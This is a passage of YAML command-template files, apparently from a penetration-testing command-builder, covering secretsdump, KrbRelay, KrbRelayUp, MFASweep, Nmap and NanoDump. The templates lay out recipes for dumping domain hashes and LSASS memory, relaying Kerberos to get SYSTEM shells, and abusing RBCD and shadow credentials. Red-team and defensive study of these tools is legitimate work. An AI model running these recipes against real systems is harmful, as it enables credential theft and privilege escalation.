max-connections 171 | type: text 172 | description: Max amount of connections to keep opened (default 1000) 173 | template: "-max-connections {0}" 174 | default: "1000" 175 | optional: false 176 | 177 | 178 | - name: system 179 | type: text 180 | description: SYSTEM hive to parse 181 | template: 182 | default: 183 | optional: false 184 | 185 | 186 | - name: bootkey 187 | type: text 188 | description: bootkey for SYSTEM hive 189 | template: 190 | default: 191 | optional: false 192 | 193 | - name: security 194 | type: text 195 | description: SECURITY hive to parse 196 | template: 197 | default: 198 | optional: false 199 | 200 | 201 | - name: sam 202 | type: text 203 | description: SAM hive to parse 204 | template: 205 | default: 206 | optional: false 207 | 208 | 209 | - name: ntds 210 | type: text 211 | description: NTDS.DIT file to parse 212 | template: "-ntds {0}" 213 | default: "ntds.dit" 214 | optional: true 215 | selected: false 216 | 217 | - name: resumefile 218 | type: text 219 | description: Resume file name to resume NTDS.DIT session dump (only available to DRSUAPI approach). This file will also be used to keep updating the session's state 220 | template: "-resumefile {0}" 221 | default: "" 222 | optional: true 223 | 224 | 225 | - name: outputfile 226 | type: text 227 | description: Base output filename. Extensions will be added for sam, secrets, cached and ntds 228 | template: "-outputfile {0}" 229 | default: "outputfile.txt" 230 | optional: true 231 | 232 | 233 | - name: rodcNo 234 | type: text 235 | description: Number of the RODC krbtgt account (only avaiable for Kerb-Key-List approach) 236 | template: "-rodcNo {0}" 237 | default: "" 238 | optional: true 239 | 240 | - name: rodcKey 241 | type: text 242 | description: AES key of the Read Only Domain Controller (only avaiable for Kerb-Key-List approach) 243 | template: "-rodcKey {0}" 244 | default: "" 245 | optional: true 246 | 247 | - name: exec-method 248 | description: Remote exec method to use at target (only when using -use-vss). Default - smbexec 249 | template: "-exec-method {0}" 250 | type: select 251 | default: smbexec 252 | options: ["smbexec","wmiexec","mmcexec"] 253 | optional: true 254 | 255 | - name: just-dc-user 256 | type: text 257 | description: Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch 258 | template: "-just-dc-user {0}" 259 | default: "targeteduser" 260 | optional: true 261 | 262 | - name: no-pass 263 | type: flag 264 | description: Don't ask for password (useful for -k) 265 | value: "-no-pass" 266 | optional: true 267 | selected: false 268 | 269 | - name: kerberos 270 | type: flag 271 | description: Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. 272 | value: '-k' 273 | optional: true 274 | selected: false 275 | 276 | 277 | - name: just-dc 278 | type: flag 279 | description: Extract only NTDS.DIT data (NTLM hashes and Kerberos keys) 280 | value: "-just-dc" 281 | optional: true 282 | selected: false 283 | 284 | - name: just-dc-ntlm 285 | type: flag 286 | description: Extract only NTDS.DIT data (NTLM hashes only) 287 | value: "-just-dc-ntlm" 288 | optional: true 289 | selected: false 290 | 291 | 292 | - name: pwd-last-set 293 | type: flag 294 | description: Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data 295 | value: "-pwd-last-set" 296 | optional: true 297 | selected: false 298 | 299 | 300 | - name: user-status 301 | type: flag 302 | description: Display whether or not the user is disabled 303 | value: "-user-status" 304 | optional: true 305 | selected: false 306 | 307 | - name: history 308 | type: flag 309 | description: Dump password history, and LSA secrets OldVal 310 | value: "-history" 311 | optional: true 312 | selected: false 313 | 314 | 315 | - name: nooutput 316 | description: 'Whether or not to print the output' 317 | optional: true 318 | selected: false 319 | type: flag 320 | value: "-nooutput" 321 | 322 | - name: ts 323 | type: flag 324 | description: Adds timestamp to every logging output 325 | value: '-ts' 326 | optional: false 327 | 328 | - name: silentcommand 329 | type: flag 330 | description: Does not execute cmd.exe to run given command (no output) 331 | value: '-silentcommand' 332 | optional: true 333 | selected: false 334 | 335 | - name: debug 336 | type: flag 337 | description: Turn DEBUG output ON 338 | value: '-debug' 339 | optional: true 340 | selected: false 341 | 342 | - name: use-vss 343 | type: flag 344 | description: Use the VSS method instead of default DRSUAPI 345 | value: "-use-vss" 346 | optional: true 347 | selected: false 348 | 349 | - name: use-keylist 350 | type: flag 351 | description: Use the Kerb-Key-List method instead of default DRSUAPI 352 | value: "-use-keylist" 353 | optional: true 354 | selected: false 355 | 356 | - name: noloop 357 | type: flag 358 | description: Stop after the first probe 359 | value: "-noloop" 360 | optional: true 361 | selected: false 362 | 363 | - name: csv 364 | type: flag 365 | description: Turn CSV output 366 | value: "-csv" 367 | optional: true 368 | selected: false 369 | 370 | 371 | sections: 372 | - name: wmiexec 373 | labels: [] 374 | mitre: "" 375 | verb: 'wmiexec.py' 376 | required_flags: [target] 377 | optional_flags: ["share","nooutput","ts","silentcommand","debug","codec","shell-type","com-version","hashes","no-pass","kerberos","aesKey","dc-ip","auth-file","keytab","command"] 378 | - name: secretsdump 379 | labels: [] 380 | mitre: "" 381 | verb: 'secretsdump.py' 382 | required_flags: [target] 383 | optional_flags: ["ts","debug","system","bootkey","security","sam","ntds","resumefile","outputfile","use-vss","rodcNo","rodcKey","use-keylist","exec-method","just-dc-user","just-dc","just-dc-ntlm","pwd-last-set","user-status","history","hashes","no-pass","kerberos","aesKey","keytab","dc-ip","target-ip"] 384 | - name: samrdump 385 | labels: [] 386 | mitre: "" 387 | verb: 'samrdump.py' 388 | required_flags: [target] 389 | optional_flags: ["csv","ts","debug","dc-ip","target-ip","port","hashes","no-pass","kerberos","aesKey"] 390 | - name: rpcdump 391 | labels: [] 392 | mitre: '' 393 | verb: 'rpcdump.py' 394 | required_flags: [target] 395 | optional_flags: ["debug","target-ip","port","hashes"] 396 | - name: netview 397 | labels: [] 398 | mitre: '' 399 | verb: 'netview.py' 400 | required_flags: [identity] 401 | optional_flags: ["user","users","target","targets","noloop","delay","max-connections","ts","debug","hashes","no-pass","kerberos","aesKey","dc-ip"] -------------------------------------------------------------------------------- /commands/KrbRelay.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/cube0x0/KrbRelay 3 | name: KrbRelay 4 | languages: 5 | - name: EXE 6 | prefix: KrbRelay.exe 7 | 8 | params: 9 | 10 | - name: Target 11 | type: label 12 | 13 | - name: spn 14 | type: text 15 | description: ServicePrincipalName for the target service 16 | template: "-spn {0}" 17 | default: 'ldap/dc01.htb.local' 18 | optional: false 19 | 20 | - name: clsid 21 | description: 22 | default: 23 | template: "-clsid {0}" 24 | type: select 25 | options: [ 26 | # SYSTEM Relay 27 | 90f18417-f0f1-484e-9d3c-59dceee5dbd8, # RPC_C_IMP_LEVEL_IDENTIFY (Windows 10 1903, Server 2019, Server 2016) 28 | 0bae55fc-479f-45c2-972e-e951be72c0c1, # RPC_C_IMP_LEVEL_IMPERSONATE (Windows 10 1903) 29 | # Cross-Session Relay 30 | 0289a7c5-91bf-4547-81ae-fec91a89dec5, # RPC_C_IMP_LEVEL_IMPERSONATE (Windows 10 1903, Server 2016) 31 | 1f87137d-0e7c-44d5-8c73-4effb68962f2, # RPC_C_IMP_LEVEL_IMPERSONATE (Windows 10 1903, Server 2016) 32 | 73e709ea-5d93-4b2e-bbb0-99b7938da9e4, # RPC_C_IMP_LEVEL_IMPERSONATE (Windows 10 1903, Server 2016) 33 | 9678f47f-2435-475c-b24a-4606f8161c16, # RPC_C_IMP_LEVEL_IMPERSONATE (Windows 10 1903, Server 2016) 34 | 9acf41ed-d457-4cc1-941b-ab02c26e4686, # RPC_C_IMP_LEVEL_IMPERSONATE (Windows 10 1903, Server 2016) 35 | ce0e0be8-cf56-4577-9577-34cc96ac087c, # RPC_C_IMP_LEVEL_IMPERSONATE (Windows 10 1903, Server 2016) 36 | 354ff91b-5e49-4bdc-a8e6-1cb6c6877182, # RPC_C_IMP_LEVEL_IMPERSONATE (Server 2019) 37 | 38e441fb-3d16-422f-8750-b2dacec5cefc, # RPC_C_IMP_LEVEL_IMPERSONATE (Server 2019) 38 | f8842f8e-dafe-4b37-9d38-4e0714a61149, # RPC_C_IMP_LEVEL_IMPERSONATE (Server 2019) 39 | 5f7f3f7b-1177-4d4b-b1db-bc6f671b8f25, # RPC_C_IMP_LEVEL_IMPERSONATE (Server 2016) 40 | 98068995-54d2-4136-9bc9-6dbcb0a4683f, # RPC_C_IMP_LEVEL_IMPERSONATE (Server 2016) 41 | bdb57ff2-79b9-4205-9447-f5fe85f37312, # RPC_C_IMP_LEVEL_IMPERSONATE (Server 2016) 42 | ] 43 | optional: false 44 | 45 | 46 | - name: optionalTarget 47 | type: text 48 | description: Optional target parameter for a given attack. Tool will use localhost if omitted 49 | template: "{0}" 50 | default: '' 51 | optional: false 52 | 53 | - name: LDAP Attacks (Pick one) 54 | type: label 55 | 56 | - name: rbcd 57 | type: text 58 | description: Configure RBCD for a given SID (default to localhost) 59 | template: "-rbcd {0} {optionalTarget}" 60 | default: '' 61 | optional: true 62 | 63 | - name: addGroupMember 64 | type: text 65 | description: desc 66 | template: "-addGroupMember {0}" 67 | default: ' ' 68 | optional: true 69 | 70 | - name: resetPassword 71 | type: text 72 | description: Reset domain user password 73 | template: "-reset-password {0}" 74 | default: ' ' 75 | optional: true 76 | 77 | - name: shadowcred 78 | type: flag 79 | description: Configure msDS-KeyCredentialLink (default to localhost) 80 | template: "-shadowcred {optionalTarget}" 81 | optional: true 82 | selected: true 83 | 84 | - name: laps 85 | type: flag 86 | description: Dump LAPS passwords (default to localhost) 87 | template: "-laps {optionalTarget}" 88 | optional: true 89 | selected: false 90 | 91 | - name: gMSA 92 | type: flag 93 | description: Dump gMSA passwords (default to localhost) 94 | template: "-gMSA {optionalTarget}" 95 | optional: true 96 | selected: false 97 | 98 | - name: SMB Attacks (Pick one) 99 | type: label 100 | 101 | - name: addPrivileges 102 | type: text 103 | description: Add privileges for a given SID 104 | template: "-add-privileges {0}" 105 | default: '' 106 | optional: true 107 | 108 | - name: serviceAdd 109 | type: text 110 | description: Create SYSTEM service 111 | template: "-service-add {0}" 112 | default: ' ' 113 | optional: true 114 | 115 | - name: secrets 116 | type: flag 117 | description: Dump SAM & LSA secrets 118 | value: '-secrets' 119 | optional: true 120 | selected: true 121 | 122 | - name: list 123 | type: flag 124 | description: List SMB shares 125 | value: '-list' 126 | optional: true 127 | selected: false 128 | 129 | - name: HTTP Attacks 130 | type: label 131 | 132 | - name: endpoint 133 | type: text 134 | description: Endpoint URI to listen 135 | template: "{0}" 136 | default: 'EWS/Exchnage.asmx' 137 | optional: true 138 | selected: true 139 | 140 | - name: ewsDelegate 141 | type: text 142 | description: EWS delegate mailbox 143 | template: "-ews-delegate {0}" 144 | default: '' 145 | optional: true 146 | 147 | - name: ewsSearch 148 | type: text 149 | description: Search inbox for keywords 150 | template: "-ews-search {0}" 151 | default: '' 152 | optional: true 153 | 154 | - name: proxy 155 | type: flag 156 | description: Start an HTTP proxy server against target 157 | value: '-proxy' 158 | optional: true 159 | selected: false 160 | 161 | - name: Options 162 | type: label 163 | 164 | - name: console 165 | type: flag 166 | description: Launch interactive console over the relay of LDAP/SMB protocols 167 | value: '-console' 168 | optional: true 169 | selected: false 170 | 171 | - name: session 172 | type: text 173 | description: ID for cross session marshalling 174 | template: "-session {0}" 175 | default: '2' 176 | optional: false 177 | 178 | - name: port 179 | type: text 180 | description: COM listener port 181 | template: "{0}" 182 | default: 183 | optional: false 184 | 185 | - name: llmnr 186 | type: flag 187 | description: Activate LLMNR poisoning 188 | value: '-llmnr' 189 | optional: true 190 | selected: false 191 | 192 | - name: ssl 193 | type: flag 194 | description: Switch to use SSL transport 195 | value: '-ssl' 196 | optional: true 197 | selected: false 198 | 199 | 200 | sections: 201 | - name: Local Privilege Escalation attacking LDAP SPN to create msDS-KeyCredentialLink on the localhost 202 | labels: [PrivEsc] 203 | mitre: '' 204 | verb: '' 205 | required_flags: [spn, clsid, shadowcred] 206 | optional_flags: [ssl, console] 207 | 208 | 209 | - name: Poison LLMNR to coerce victims into creating and sending service tickets of a given SMB related SPN 210 | labels: [PrivEsc] 211 | mitre: 'T1557.001' 212 | verb: '' 213 | required_flags: [llmnr, spn] 214 | optional_flags: [secrets, serviceAdd, addPrivileges, list, console] 215 | 216 | 217 | - name: Exploit cross-session LDAP, choosing any LDAP attack 218 | labels: [PrivEsc] 219 | mitre: 'T1557.001' 220 | verb: '' 221 | required_flags: [spn, session, clsid] 222 | optional_flags: [rbcd, shadowcred, addGroupMember, laps, gMSA, resetPassword, ssl, console] 223 | 224 | - name: Exploit cross-session HTTP, choosing any HTTP attack 225 | labels: [PrivEsc] 226 | mitre: '' 227 | verb: '' 228 | required_flags: [spn,endpoint, session,clsid] 229 | optional_flags: [ewsSearch, ewsDelegate, proxy, ssl] 230 | 231 | - name: Exploit cross-session SMB, chossing any SMB attack 232 | labels: [PrivEsc] 233 | mitre: 'T1557.001' 234 | verb: '' 235 | required_flags: [spn,session,clsid] 236 | optional_flags: [addPrivileges, secrets, serviceAdd, console] -------------------------------------------------------------------------------- /commands/KrbRelayUp.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/Dec0ne/KrbRelayUp 3 | name: KrbRelayUp 4 | languages: 5 | - name: EXE 6 | prefix: KrbRelayUp.exe 7 | 8 | params: 9 | 10 | 11 | - name: Exploitation 12 | type: label 13 | 14 | - name: method 15 | description: Abuse method to use in after a successful relay to LDAP (default=rbcd) 16 | default: '' 17 | template: "-m {0}" 18 | type: select 19 | options: [rbcd,shadowcred,adcs] 20 | optional: false 21 | 22 | - name: port 23 | type: text 24 | description: Port for Com Server (default=12345) (RELAY) 25 | template: "-p {0}" 26 | default: '12345' 27 | optional: true 28 | 29 | - name: clsid 30 | description: CLSID to use for coercing Kerberos auth from local machine account (default=90f18417-f0f1-484e-9d3c-59dceee5dbd8) (RELAY) 31 | default: 32 | template: "-cls {0}" 33 | type: select 34 | options: [ 35 | # SYSTEM Relay 36 | 90f18417-f0f1-484e-9d3c-59dceee5dbd8, # RPC_C_IMP_LEVEL_IDENTIFY (Windows 10 1903, Server 2019, Server 2016) 37 | 0bae55fc-479f-45c2-972e-e951be72c0c1, # RPC_C_IMP_LEVEL_IMPERSONATE (Windows 10 1903) 38 | ] 39 | optional: true 40 | 41 | - name: impersonate 42 | type: text 43 | description: User to impersonate. should be a local administrator in the target computer. (default=Administrator) (SPAWN) 44 | template: "-i {0}" 45 | default: '' 46 | optional: true 47 | 48 | - name: ServiceName 49 | type: text 50 | description: Name of the service to be created. (default=KrbSCM) (SPAWN/KRBSCM) 51 | template: "-s {0}" 52 | default: '' 53 | optional: true 54 | 55 | - name: ServiceCommand 56 | type: text 57 | description: Service command [binPath]. (default = spawn cmd.exe as SYSTEM) (SPAWN/KRBSCM) 58 | template: "-sc {0}" 59 | default: '' 60 | optional: true 61 | 62 | 63 | 64 | - name: RBCD Options 65 | type: label 66 | 67 | - name: CreateNewComputerAccount 68 | type: flag 69 | description: Create new computer account for RBCD. Will use the current authenticated user. 70 | value: '-c' 71 | optional: true 72 | selected: false 73 | 74 | - name: ComputerName 75 | type: text 76 | description: Name of attacker owned computer account for RBCD. (default=KRBRELAYUP$) 77 | template: "-cn {0}" 78 | default: '' 79 | optional: true 80 | 81 | - name: ComputerPassword 82 | type: text 83 | description: Password of computer account for RBCD. (default=RANDOM [if -c is enabled]) 84 | template: "-cp {0}" 85 | default: '' 86 | optional: true 87 | 88 | - name: ComputerHash 89 | type: text 90 | description: Password NT hash of computer account for RBCD. (either -cp or -ch must be specified) (SPAWN) 91 | template: "-ch {0}" 92 | default: 93 | optional: true 94 | 95 | - name: ADCS / Shadowcred Options 96 | type: label 97 | 98 | - name: ForceShadowCred 99 | type: flag 100 | description: Clear the msDS-KeyCredentialLink attribute of the attacked computer account before adding our new shadow credentials. (SHADOWCRED only) 101 | value: '-f' 102 | optional: true 103 | selected: false 104 | - name: CAEndpoint 105 | type: text 106 | description: CA endpoint FQDN (default = same as DC) 107 | template: "-ca {0}" 108 | default: '' 109 | optional: true 110 | 111 | - name: CertificateTemplate 112 | type: text 113 | description: Certificate template to request for (default=Machine) 114 | template: "-cet {0}" 115 | default: '' 116 | optional: true 117 | 118 | - name: certificate 119 | type: text 120 | description: Base64 encoded certificate or path to certificate file 121 | template: "-ce {0}" 122 | default: 123 | optional: true 124 | 125 | - name: CertificatePassword 126 | type: text 127 | description: Certificate password (if applicable) 128 | template: "-cep {0}" 129 | default: 'SomeCompPassword' 130 | optional: true 131 | selected: false 132 | 133 | - name: https 134 | type: flag 135 | description: Connect to CA endpoint over secure HTTPS instead of HTTP) 136 | value: '-https' 137 | optional: true 138 | selected: false 139 | 140 | - name: General Options 141 | type: label 142 | 143 | - name: domain 144 | type: text 145 | description: FQDN of domain. (Optional) 146 | template: "-d {0}" 147 | default: '' 148 | optional: true 149 | 150 | - name: domainController 151 | type: text 152 | description: FQDN of domain controller. (Optional) 153 | template: "-dc {0}" 154 | default: '' 155 | optional: true 156 | 157 | - name: ssl 158 | type: flag 159 | description: Use LDAP over SSL. (Optional) 160 | value: '-ssl' 161 | optional: true 162 | selected: false 163 | 164 | - name: CreateNetOnly 165 | type: flag 166 | description: Use CreateNetOnly (needs to be on disk) instead of PTT when importing ST (enabled if using FULL mode) 167 | value: '-n' 168 | optional: true 169 | selected: false 170 | 171 | - name: verbose 172 | type: flag 173 | description: Show verbose output. (Optional) 174 | value: '-v' 175 | optional: true 176 | selected: false 177 | 178 | 179 | sections: 180 | - name: Create computer account, force SYSTEM account auth via COM server, relay to LDAP, and assign RBCD rights to created computer 181 | labels: [PrivEsc, LDAP] 182 | mitre: 'T1557.001' 183 | verb: 'relay' 184 | required_flags: [domain, CreateNewComputerAccount, ComputerName, ComputerPassword] 185 | optional_flags: [domainController,ssl,verbose] 186 | 187 | - name: Use owned computer account with RBCD rights to spawn SYSTEM shell 188 | labels: [PrivEsc,Kerberos] 189 | mitre: 'T1543.003' 190 | verb: 'spwan' 191 | required_flags: [domain, ComputerName, ComputerPassword] 192 | optional_flags: [ComputerPassword, ComputerHash] 193 | 194 | - name: Execute the full attack to spawn SYSTEM shell, choosing any attack method 195 | labels: [PrivEsc] 196 | mitre: 'T1557.001' 197 | verb: 'full' 198 | required_flags: [method] 199 | optional_flags: [domain,domainController,certificate,CertificatePassword,CreateNetOnly,ForceShadowCred,ssl,verbose] 200 | 201 | - name: Use the currently loaded Kerberos Service Ticket to create a new service running as SYSTEM 202 | labels: [PrivEsc] 203 | mitre: 'T1543.003' 204 | verb: krbscm 205 | required_flags: [ServiceName, ServiceCommand] 206 | optional_flags: [verbose] 207 | 208 | - name: Craft a custom command for full attack 209 | labels: [PrivEsc] 210 | mitre: '' 211 | verb: 'full' 212 | required_flags: [method] 213 | optional_flags: [port,clsid,domain,domainController,certificate,CAEndpoint,CertificateTemplate,CertificatePassword,CreateNetOnly,ForceShadowCred,CreateNewComputerAccount,ComputerName,ComputerHash,ComputerPassword,ServiceName,ServiceCommand,impersonate,https,ssl,verbose] -------------------------------------------------------------------------------- /commands/MFASweep.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/dafthack/MFASweep 3 | name: MFASweep 4 | languages: 5 | - name: PS 6 | prefix: "" 7 | 8 | params: 9 | - name: MFASweepEndpoint 10 | description: Selected target endpoint to test for MFA 11 | default: 'Invoke-MFASweep' 12 | template: "{0}" 13 | type: select 14 | options: [ 15 | 'Invoke-MFASweep', 16 | 'Invoke-GraphAPIAuth', 17 | 'Invoke-AzureManagementAPIAuth', 18 | 'Invoke-EWSAuth', 19 | 'Invoke-O365WebPortalAuth', 20 | 'Invoke-O365WebPortalAuthMobile', 21 | 'Invoke-O365ActiveSyncAuth', 22 | 'Invoke-ADFSAuth' 23 | ] 24 | optional: false 25 | 26 | - name: Username 27 | type: text 28 | description: Username 29 | template: "-Username {0}" 30 | default: User1 31 | optional: false 32 | - name: Password 33 | type: text 34 | description: Password 35 | template: "-Password {0}" 36 | default: 37 | optional: false 38 | 39 | - name: Recon 40 | type: flag 41 | description: Reconnaissance 42 | value: -Recon 43 | optional: true 44 | selected: false 45 | - name: IncludeADFS 46 | type: flag 47 | description: Include ADFS 48 | value: -IncludeADFS 49 | optional: true 50 | selected: false 51 | 52 | sections: 53 | - name: Self crafted command 54 | labels: ["Recon"] 55 | mitre: '' 56 | verb: '' 57 | required_flags: [MFASweepEndpoint, Username, Password] 58 | optional_flags: [Recon, IncludeADFS] 59 | - name: Test Azure APIs for MFA 60 | labels: ["Recon"] 61 | mitre: '' 62 | verb: 'Invoke-MFASweep' 63 | required_flags: [Username, Password] 64 | optional_flags: [Recon, IncludeADFS] 65 | - name: Test Microsoft Graph API for MFA 66 | labels: ["Recon"] 67 | mitre: '' 68 | verb: 'Invoke-GraphAPIAuth' 69 | required_flags: [Username, Password] 70 | optional_flags: [] 71 | - name: Test Azure Service Management API for MFA 72 | labels: ["Recon"] 73 | mitre: '' 74 | verb: 'Invoke-AzureManagementAPIAuth' 75 | required_flags: [Username, Password] 76 | optional_flags: [] 77 | - name: Test Microsoft 365 Exchange Web Services for MFA 78 | labels: ["Recon"] 79 | mitre: '' 80 | verb: 'Invoke-EWSAuth' 81 | required_flags: [Username, Password] 82 | optional_flags: [] 83 | - name: Test Microsoft 365 Web Portal for MFA 84 | labels: ["Recon"] 85 | mitre: '' 86 | verb: 'Invoke-O365WebPortalAuth' 87 | required_flags: [Username, Password] 88 | optional_flags: [] 89 | - name: Test Microsoft 365 Web Portal w/ Mobile User Agent for MFA 90 | labels: ["Recon"] 91 | mitre: '' 92 | verb: 'Invoke-O365WebPortalAuthMobile' 93 | required_flags: [Username, Password] 94 | optional_flags: [] 95 | - name: Microsoft 365 Active Sync for MFA 96 | labels: ["Recon"] 97 | mitre: '' 98 | verb: 'Invoke-O365ActiveSyncAuth' 99 | required_flags: [Username, Password] 100 | optional_flags: [] 101 | - name: Test ADFS for MFA 102 | labels: ["Recon"] 103 | mitre: '' 104 | verb: 'Invoke-ADFSAuth' 105 | required_flags: [Username, Password] 106 | optional_flags: [] -------------------------------------------------------------------------------- /commands/NMAP.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/nmap/nmap 3 | name: NMAP 4 | languages: 5 | - name: Linux 6 | prefix: nmap 7 | - name: EXE 8 | prefix: nmap.exe 9 | 10 | params: 11 | - name: Target Host/s 12 | type: label 13 | - name: Target 14 | type: text 15 | description: Specify IP or a list of IPs seperated by space 16 | template: "{0}" 17 | default: "192.168.1.1" 18 | optional: true 19 | selected: true 20 | - name: TargetsFromFile 21 | type: text 22 | description: Path to file containing targets to scan 23 | template: "-iL {0}" 24 | default: targets.txt 25 | optional: true 26 | selected: true 27 | 28 | - name: Target Ports 29 | type: label 30 | - name: Ports 31 | type: text 32 | description: Ports to scan. 33 | template: "--Ports {0}" 34 | default: 22-25,80,135-139,443,445,8080,8000,8081,9090 35 | optional: true 36 | selected: false 37 | - name: TopPorts 38 | type: text 39 | description: Port scan the top x ports 40 | template: "--top-ports {0}" 41 | default: 1000 42 | optional: true 43 | 44 | - name: Output 45 | type: label 46 | - name: OutputType 47 | type: select 48 | description: Output file type 49 | template: "-o{0}" 50 | default: "All" 51 | optional: false 52 | options: ["Nmap", "Xml", "Greppable", "All"] 53 | - name: OutputPrefix 54 | type: text 55 | description: The name of the output file 56 | template: "-oA {0}" 57 | default: output 58 | optional: true 59 | 60 | 61 | - name: Scan options 62 | type: label 63 | - name: ScanSpeed 64 | type: select 65 | description: Specify scanning speed to use. Paranoid (0) - SuperFast (5) 66 | template: "-t{0}" 67 | default: "3" 68 | optional: true 69 | options: ["0","1","2","3","4","5"] 70 | - name: SynScan 71 | type: flag 72 | description: Send only TCP Syn packets, without FIN the connection. 73 | value: -sS 74 | optional: true 75 | selected: false 76 | - name: NoPing 77 | type: flag 78 | description: Disable host discovery. Port scan only. 79 | value: -Pn 80 | optional: true 81 | selected: false 82 | - name: NoResolving 83 | type: flag 84 | description: Never do DNS resolution 85 | value: -n 86 | optional: true 87 | selected: false 88 | - name: sL 89 | type: flag 90 | description: No Scan. List targets only 91 | value: -sL 92 | optional: true 93 | selected: false 94 | - name: sn 95 | type: flag 96 | description: Disable port scanning. Host discovery only. 97 | value: -sn 98 | optional: true 99 | selected: false 100 | - name: PS 101 | type: flag 102 | description: TCP SYN discovery on port x. Port 80 by default 103 | value: -PS{Ports} 104 | template: -PS{Ports} 105 | optional: true 106 | selected: false 107 | - name: PA 108 | type: flag 109 | description: TCP ACK discovery on port x. Port 80 by default 110 | value: -PA{Ports} 111 | template: -PA{Ports} 112 | optional: true 113 | selected: false 114 | - name: PU 115 | type: flag 116 | description: UDP discovery on port x. Port 40125 by default 117 | value: -PU{Ports} 118 | template: -PU{Ports} 119 | optional: true 120 | selected: false 121 | - name: PR 122 | type: flag 123 | description: ARP discovery on local network 124 | value: -PR 125 | optional: true 126 | selected: false 127 | 128 | 129 | 130 | sections: 131 | - name: Basic port scan of a single IP 132 | labels: ["Recon"] 133 | mitre: '' 134 | verb: '' 135 | required_flags: ["Flags", "Target"] 136 | optional_flags: [Ports, NoResolving, SynScan, NoPing, OutputPrefix] 137 | 138 | 139 | - name: Scan targets from file 140 | labels: ["Recon"] 141 | mitre: '' 142 | verb: '' 143 | required_flags: ["iL"] 144 | optional_flags: [TargetsFromFile, Ports, NoResolving, SynScan, NoPing, OutputPrefix] 145 | 146 | 147 | - name: Speed controlled scan 148 | labels: ["Recon"] 149 | mitre: '' 150 | verb: '' 151 | required_flags: ["Target", "ScanSpeed", "NoPing"] 152 | optional_flags: [] 153 | 154 | 155 | - name: TCP SYN port scan (Default) 156 | labels: ["Recon"] 157 | mitre: '' 158 | verb: '' 159 | required_flags: ["Target", "sS"] 160 | optional_flags: [] 161 | 162 | 163 | - name: TCP connect port scan (Default without root privilege) 164 | labels: ["Recon"] 165 | mitre: '' 166 | verb: '' 167 | required_flags: ["Target", "sT"] 168 | optional_flags: [] 169 | 170 | 171 | - name: UDP port scan 172 | labels: ["Recon"] 173 | mitre: '' 174 | verb: '' 175 | required_flags: ["Target", "sU"] 176 | optional_flags: [] 177 | 178 | 179 | - name: TCP ACK port scan 180 | labels: ["Recon"] 181 | mitre: '' 182 | verb: '' 183 | required_flags: ["Target", "sA"] 184 | optional_flags: [] 185 | 186 | 187 | - name: TCP Window port scan 188 | labels: ["Recon"] 189 | mitre: '' 190 | verb: '' 191 | required_flags: ["Target", "sW"] 192 | optional_flags: [] 193 | 194 | 195 | - name: TCP Maimon port scan 196 | labels: ["Recon"] 197 | mitre: '' 198 | verb: '' 199 | required_flags: ["Target", "sM"] 200 | optional_flags: [] 201 | 202 | -------------------------------------------------------------------------------- /commands/NanoDump.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/fortra/nanodump 3 | name: NanoDump 4 | languages: 5 | - name: EXE 6 | prefix: 'nanodump.x64.exe' 7 | 8 | params: 9 | - name: Output 10 | type: label 11 | 12 | - name: DumpPath 13 | type: text 14 | description: File path of the dump 15 | template: "--write {0}" 16 | default: 'C:\temp\out.dmp' 17 | optional: true 18 | - name: Valid 19 | type: flag 20 | description: Create a dump with a valid signature 21 | value: "--valid" 22 | optional: true 23 | selected: false 24 | 25 | - name: Dump via handle to LSASS 26 | type: label 27 | 28 | - name: Duplicate 29 | type: flag 30 | description: duplicate a high privileged existing LSASS handle 31 | value: '--duplicate' 32 | optional: true 33 | selected: false 34 | 35 | - name: DuplicateLow 36 | type: flag 37 | description: duplicate a low privileged existing LSASS handle and then elevate it 38 | value: '--duplicate-elevate' 39 | optional: true 40 | selected: false 41 | 42 | - name: SeclogonLeakLocal 43 | type: flag 44 | description: leak an LSASS handle into nanodump via seclogon 45 | value: '--seclogon-leak-local' 46 | optional: true 47 | selected: false 48 | 49 | - name: SeclogonLeakRemote 50 | type: text 51 | description: leak an LSASS handle into another process via seclogon and duplicate it 52 | template: '--seclogon-leak-remote {0}' 53 | default: "C:\\Windows\\notepad.exe" 54 | optional: true 55 | selected: false 56 | - name: SeclogonDuplicate 57 | type: flag 58 | description: make seclogon open a handle to LSASS and duplicate it 59 | value: '--seclogon-duplicate' 60 | optional: true 61 | selected: false 62 | - name: SpoofCallstack 63 | type: flag 64 | description: open a handle to LSASS using a fake calling stack 65 | value: '--spoof-callstack' 66 | optional: true 67 | selected: false 68 | - name: EelevateHandle 69 | type: flag 70 | description: open a handle to LSASS with low privileges and duplicate it to gain higher privileges 71 | value: '--elevate-handle' 72 | optional: true 73 | selected: false 74 | 75 | - name: Dump via WerFault.exe 76 | type: label 77 | 78 | - name: SilentProcessExit 79 | type: text 80 | description: Force WerFault.exe to dump LSASS via SilentProcessExit 81 | template: '--silent-process-exit {0}' 82 | default: "C:\\Windows\\Temp\\" 83 | optional: true 84 | selected: false 85 | - name: Shtinkering 86 | type: flag 87 | description: Force WerFault.exe to dump LSASS via Shtinkering 88 | value: '--shtinkering' 89 | optional: true 90 | selected: false 91 | 92 | 93 | - name: Fork / Snapshot dump (Avoid Direct Read) 94 | type: label 95 | 96 | - name: Fork 97 | type: flag 98 | description: Fork the target process before dumping 99 | value: '--fork' 100 | optional: true 101 | selected: false 102 | - name: Snapshot 103 | type: flag 104 | description: Snapshot the target process before dumping 105 | value: '--snapshot' 106 | optional: true 107 | selected: false 108 | 109 | 110 | - name: Misc 111 | type: label 112 | 113 | - name: GetPid 114 | type: flag 115 | description: Print the PID of LSASS and exit 116 | value: '--getpid' 117 | optional: true 118 | selected: false 119 | 120 | sections: 121 | - name: Read LSASS indirectly by creating a fork and write the dump to disk with an invalid signature 122 | labels: [LSASS, Creds] 123 | mitre: '' 124 | verb: '' 125 | required_flags: [Fork, DumpPath] 126 | optional_flags: [] 127 | - name: Leak an LSASS handle in a notepad process, get access to LSASS via handle duplicate, then read it indirectly by creating a fork. 128 | labels: [LSASS, Creds] 129 | mitre: '' 130 | verb: '' 131 | required_flags: [SeclogonLeakRemote, Fork, Valid] 132 | optional_flags: 